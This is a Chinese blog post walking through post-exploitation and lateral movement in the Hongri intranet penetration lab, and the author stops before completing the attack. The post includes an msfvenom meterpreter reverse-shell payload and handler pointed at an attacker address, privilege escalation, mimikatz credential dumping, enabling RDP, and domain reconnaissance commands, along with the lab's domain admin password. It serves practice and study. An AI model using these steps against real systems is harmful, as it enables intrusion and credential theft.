紅日靶場(內網滲透)——2

yaolingyu1發表於2022-05-15

1.後滲透。

之前我們已經將小馬上傳,在這裡用webshell進行進一步滲透。

1)基於msf

利用msf生成exe,並上傳。

msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.248.128 LPORT=1234 -f exe -o 1.exe   

 

 

 

use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 192.168.248.128
set lport 1234
exploit 

 

 

 之後直接進行提權。

2)進行提權。

 

 

 這裡使用者為admin,所以可以直接提到system。

3)獲取賬號密碼。

Windows系統下的hash密碼格式為:
使用者名稱稱:RID:LM-HASH值:NT-HASH值
例如:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0

windows hash加密機制
  1. 先將使用者密碼轉換為十六進位制格式。
  2. 將十六進位制格式的密碼進行Unicode編碼。
  3. 使用MD4摘要演算法對Unicode編碼資料進行Hash計算

 

具體請參考:https://blog.csdn.net/vanarrow/article/details/105667617?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165253258416781435465254%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=165253258416781435465254&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-1-105667617-null-null.142^v9^pc_search_result_cache,157^v4^control&utm_term=windows+hash%E5%8A%A0%E5%AF%86%E6%9C%BA%E5%88%B6&spm=1018.2226.3001.4187

4)mimikatz

這裡主要利用mimikatz進行明文密碼的獲取

這裡不過多介紹,詳情可以參考這篇文章:

https://www.csdn.net/tags/Ntzacg2sMTE0NDUtYmxvZwO0O0OO0O0O.html

5)開啟3389埠

run post/windows/manage/enable_rdp

2.橫向滲透

1)資訊收集

ipconfig /all   # 檢視本機ip,所在域
route print     # 列印路由資訊
net view        # 檢視區域網內其他主機名
arp -a          # 檢視arp快取
net start       # 檢視開啟了哪些服務
net share       # 檢視開啟了哪些共享
net share ipc$  # 開啟ipc共享
net share c$    # 開啟c盤共享
net use \\192.168.xx.xx\ipc$ "" /user:""    # 與192.168.xx.xx建立空連線
net use \\192.168.xx.xx\c$ "密碼" /user:"使用者名稱"    # 建立c盤共享
dir \\192.168.xx.xx\c$\user    # 檢視192.168.xx.xx c盤user目錄下的檔案

net config Workstation    # 檢視計算機名、全名、使用者名稱、系統版本、工作站、域、登入域
net user                 # 檢視本機使用者列表
net user /domain         # 檢視域使用者
net localgroup administrators    # 檢視本地管理員組(通常會有域使用者)
net view /domain         # 檢視有幾個域
net user 使用者名稱 /domain   # 獲取指定域使用者的資訊
net group /domain        # 檢視域裡面的工作組,檢視把使用者分了多少組(只能在域控上操作)
net group 組名 /domain    # 檢視域中某工作組
net group "domain admins" /domain  # 檢視域管理員的名字
net group "domain computers" /domain  # 檢視域中的其他主機名
net group "doamin controllers" /domain  # 檢視域控制器(可能有多臺)

以上是一些常用指令。

 

 

 

 大概收集的資訊為

域控為OWA$
域管理員為Administrator
密碼為HONGRISEC@2019
內網網段為192.168.52.1/24

進入msf收集ip

 

共三個ip,其中192.168.52.143為win7

利用msf掃描192.168.52.141埠

 

 

 192.168.52.138得到的資訊相同

因為兩者都開放445埠,採用ms17-010進行攻擊。

利用ms17-010時發現一個問題,不能直接利用,所以開啟3389,使用代理。

這裡因為個人環境的一些問題,沒有繼續下去,自己還是差很多東西,之後繼續努力吧。

 

相關文章